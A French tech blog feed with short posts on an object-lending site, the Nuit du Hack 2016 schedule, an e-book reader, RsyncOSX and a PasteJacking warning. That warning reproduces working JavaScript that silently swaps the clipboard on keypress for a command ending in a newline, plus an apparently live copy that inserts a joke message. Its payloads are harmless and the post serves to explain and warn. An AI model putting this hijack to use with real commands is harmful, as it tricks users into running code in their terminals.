Mise à jour de la base de données, veuillez patienter...

On a tous chez nous des tas d'objets dont on se sert presque pas, voire pas du tout. Vélo, jeux, appareils de cuisine, tente, enceintes, livres, tondeuse, escabeau, raquettes, appareil à crêpes, rollers, karcher, escabeau, skis, sac à dos...... Il suffit de regarder autour de vous, et vous allez en trouver plein !

Jonathan et ses associés, lecteurs de Korben, ont imaginé un excellent concept de prêt et d'emprunt d'objets entre particuliers. Sur leur site Mutum (mon code parrain c'est a2tSdTtd), vous pourrez référencer les objets que vous souhaitez mettre à disposition autour de vous, fixer une caution pour ceux qui ont de la valeur et établir un calendrier de prêt.

Si vous cherchez à emprunter un objet, il vous suffit de faire une petite recherche et de réserver l'objet qui vous intéresse via le site. Il n'y a pas d'argent en jeu, mais une monnaie virtuelle baptisée le Mutum que vous gagnerez en prêtant vos objets et que vous dépenserez en empruntant les objets des autres. Le site Mutum ne prend pas de commission et tout est gratuit. D'ailleurs, on ne peut pas spéculer avec le Mutum puisqu'il n'est pas convertible en véritable argent et se périme au bout d'un an.

C'est top pour faire des économies, s'entraider entre voisins, et lier des contacts avec les gens autour de chez vous.

À expérimenter !

Cet article merveilleux et sans aucun égal intitulé : Prêtez et emprunter gratuitement grâce au site Mutum ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Je ne sais pas ce que vous faites du 2 au 3 juillet, mais moi je serai du côté de Disneyland Paris pour assister à la Nuit du Hack 2016. Ça va démarrer le samedi à partir de 9h avec une journée-conférences et de Bug Bounty (sponso par Qwant) dont voici le détail :

10h00 : Keynote : À venir.
10h30 : Ouverture Bug Bounty
10h45 : (FR) Windows 10 - Security and Privacy par Paul Hernault
11h30 : (EN) Tails - Security, Maintainability and Usability, pick three! par Julien Vosin
12h15 : (FR) Microservices hacking & security par Clad
13h00 : Pause
13h45 : Bounty time
14h00 : (EN) A Dozen Years of Shellphish: From DEFCON to the DARPA Cyber Grand Challenge par Antonio Bianchi 14h45 : (FR) Review of the ZigBee security of a famous French set-top box par Renaud Lifchitz 15h30 : (EN) An In-Depth Dive into the Ethereum Protocol par Lefteris Karapetsas
17h00 : Bounty Time
17h15 : (FR) House intercoms attacks: when frontdoors become backdoors par Sébastien Dudek 18h00 : (EN) Improvised LockPicking tools par Till Lenze et Alexandre Triffault
18h45 : (FR) Turning a GPS-based dating application into a tracking system  par Julien Szlamowicz et Julien Legras
19h30 : (EN) Developing x64dbg par Duncan Ogilvie
21h00 : Bounty  Time
21h15 : (FR) Mass-pwning with a small IoT spy bug par Damien Cauquil
22h00 : (EN) Trust No One. ATMs and their dirty little secrets par Olga  Kochetova

Évidemment, comme d'habitude ces 24h seront aussi l'occasion de participer à des challenges, d'assister à un CTF avec les meilleures équipes de hackers, sans oublier les ateliers qui vous permettront d'expérimenter de nouvelles choses (lockpicking, Arduino, vie privée, robotique, analyse de malware...etc.).

YesWeHack sera aussi présent pour mettre en relation les recruteurs et les experts en sécurité qui cherchent du boulot, et si vous emmenez vos enfants, sachez qu'ils ne s'ennuieront pas grâce à l'espace NDH Kids où ils apprendront à bidouiller des tas de trucs.

Lors de cette Nuit du Hack, vous pourrez aussi alerter d'éventuels problèmes de sécurité lors du confessionnal Zataz (Hâte de voir Damien Bancal en aube blanche). Quant à moi, je me baladerai là bas donc on aura le temps de papoter et faire des photos dans tous les sens.

Si tout ça vous plait, sachez que jusqu'au 1er juin, la place est à 50 €. Après cette date, ça passera à 66 €.

Pour vous inscrire c'est par ici.

Cet article merveilleux et sans aucun égal intitulé : La Nuit du Hack 2016 c’est bientôt ! Pensez à réserver votre place ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Jusqu'à présent, le seul logiciel trop méga cool que je connaissais pour gérer ma bibliothèque de livres électroniques, c'était Calibre. Puis là, je viens de tomber par hasard sur Bibliovore, un outil de gestion de bibliothèque numérique pour Windows 10 uniquement.

Voici les fonctionnalités :

• Supporte deux des formats de livre numérique les plus populaires : EPUB et PDF
• Ajoutez vos livres un par un ou plusieurs simultanément dans votre bibliothèque, puis organisez les selon vos souhaits
• Ouverture rapide des livres
• Reprise de lecture
• Accès direct par la table des matières
• Ajout de marque-pages personnalisés
• Réglage des paramètres de police de lecture pour un meilleur confort
• Mode jour / nuit
• Gestion des thèmes de lecture (Noir sur blanc, sépia, etc.)
• Respect de la mise en page de l'éditeur du livre
• Recherche au sein de la bibliothèque
• Editez les métadonnées de vos livres pour mieux les organiser
• Parcourez et téléchargez des livres directement au sein de Bibliovore depuis des bibliothèques en ligne (OPDS).
• Lecture partagée sur plusieurs appareils (avancement et paramètres de lecture)
• Mode portrait / Mode paysage
• Mode une page / deux pages
• Livres multivolumes pris en charge au sein des séries

Il est assez joli et si vous avez une tablette Surface, je pense que ça va vous être bien utile !

Bonne lecture à tous !

Cet article merveilleux et sans aucun égal intitulé : Bibliovore – Lisez vos livres électroniques sous Windows 10 sans vous faire mal aux yeux ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

La technique n'est pas nouvelle et j'ai déjà abordé le problème en 2015. En gros, il est possible avec un simple bout de javascript, de mettre autre chose dans le presse-papier de l'ordinateur en cas de copier coller.

Cela peut poser de nombreux soucis notamment sur les sites qui donnent des lignes de commande que les gens copient et collent machinalement. J'ai déjà mis en garde sur le sujet donc je ne reviendrai pas dessus (aller lire l'article linké ci-dessus). Par contre, pour ceux qui veulent comprendre comment ça fonctionne, sachez qu'un bout de code baptisé PasteJacking est disponible sur Github.

Voici le code en question :

<html>
<body>
Copy the text below and run it in your terminal for totally not evil things to happen.
</br>

<p>echo "not evil"</p>
<script>
function copyTextToClipboard(text) {
var textArea = document.createElement("textarea");

//
// *** This styling is an extra step which is likely not required. ***
//
// Why is it here? To ensure:
// 1. the element is able to have focus and selection.
// 2. if element was to flash render it has minimal visual impact.
// 3. less flakyness with selection and copying which **might** occur if
// the textarea element is not visible.
//
// The likelihood is the element won't even render, not even a flash,
// so some of these are just precautions. However in IE the element
// is visible whilst the popup box asking the user for permission for
// the web page to copy to the clipboard.
//

// Place in top-left corner of screen regardless of scroll position.
textArea.style.position = 'fixed';
textArea.style.top = 0;
textArea.style.left = 0;

// Ensure it has a small width and height. Setting to 1px / 1em
// doesn't work as this gives a negative w/h on some browsers.
textArea.style.width = '2em';
textArea.style.height = '2em';

// We don't need padding, reducing the size if it does flash render.
textArea.style.padding = 0;

// Clean up any borders.
textArea.style.border = 'none';
textArea.style.outline = 'none';
textArea.style.boxShadow = 'none';

// Avoid flash of white box if rendered for any reason.
textArea.style.background = 'transparent';
textArea.value = text;

document.body.appendChild(textArea);

textArea.select();

try {
var successful = document.execCommand('copy');
var msg = successful ? 'successful' : 'unsuccessful';
console.log('Copying text command was ' + msg);
} catch (err) {
console.log('Oops, unable to copy');
}

document.body.removeChild(textArea);
}

document.addEventListener('keydown', function(event) {
var ms = 800;
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
copyTextToClipboard('echo "evil"\n');
});

</script>
</body>

</html>

Pour que ça fonctionne, il faut que la victime fasse un CTRL+C (ou CMD + C sous OSX). Si elle fait un clic droit "copier", ça ne fonctionnera pas.

<script type="text/rocketscript"> function copyTextToClipboard(text) { var textArea = document.createElement("textarea"); // // *** This styling is an extra step which is likely not required. *** // // Why is it here? To ensure: // 1. the element is able to have focus and selection. // 2. if element was to flash render it has minimal visual impact. // 3. less flakyness with selection and copying which **might** occur if // the textarea element is not visible. // // The likelihood is the element won't even render, not even a flash, // so some of these are just precautions. However in IE the element // is visible whilst the popup box asking the user for permission for // the web page to copy to the clipboard. // // Place in top-left corner of screen regardless of scroll position. textArea.style.position = 'fixed'; textArea.style.top = 0; textArea.style.left = 0; // Ensure it has a small width and height. Setting to 1px / 1em // doesn't work as this gives a negative w/h on some browsers. textArea.style.width = '2em'; textArea.style.height = '2em'; // We don't need padding, reducing the size if it does flash render. textArea.style.padding = 0; // Clean up any borders. textArea.style.border = 'none'; textArea.style.outline = 'none'; textArea.style.boxShadow = 'none'; // Avoid flash of white box if rendered for any reason. textArea.style.background = 'transparent'; textArea.value = text; document.body.appendChild(textArea); textArea.select(); try { var successful = document.execCommand('copy'); var msg = successful ? 'successful' : 'unsuccessful'; console.log('Copying text command was ' + msg); } catch (err) { console.log('Oops, unable to copy'); } document.body.removeChild(textArea); } document.addEventListener('keydown', function(event) { var ms = 800; var start = new Date().getTime(); var end = start; while(end < start + ms) { end = new Date().getTime(); } copyTextToClipboard('AH AH AH AH AH COMMENT TU SAIS TROP PAS COPIER COLLER !!! C\'est pas compliqué pourtant !\n'); });

Cet article merveilleux et sans aucun égal intitulé : Attention au PasteJacking (et merci de ne pas copier coller cet article) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Si vous êtes sous Mac et que vous voulez sauvegarder et synchroniser des données entre vos ordinateurs ou avec un serveur distant, une bonne solution est d'utiliser le logiciel libre Rsync.

Mais tout le monde n'est pas à l'aise en ligne de commande. C'est pourquoi Thomas Evensen a créé RsyncOSX qui est ni plus ni moins qu'une interface graphique (GUI) pour RSync.

Il permet donc de faire des sauvegardes incrémentales (ou non d'ailleurs) et des restaurations, soit localement (disque USB par exemple), soit vers des serveurs distants (votre NAS, un serveur web à l'autre bout du monde...etc.). Bref tout pareil qu'avec RSync mais en mode clickodrome.

À garder dans votre boite à outils.

Sinon, dans le même genre, j'utilise AASync qui fait grosso modo la même chose (via SFTP) sauf qu'il est payant.

Cet article merveilleux et sans aucun égal intitulé : RSyncOSX – Une interface graphique OSX pour RSync ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.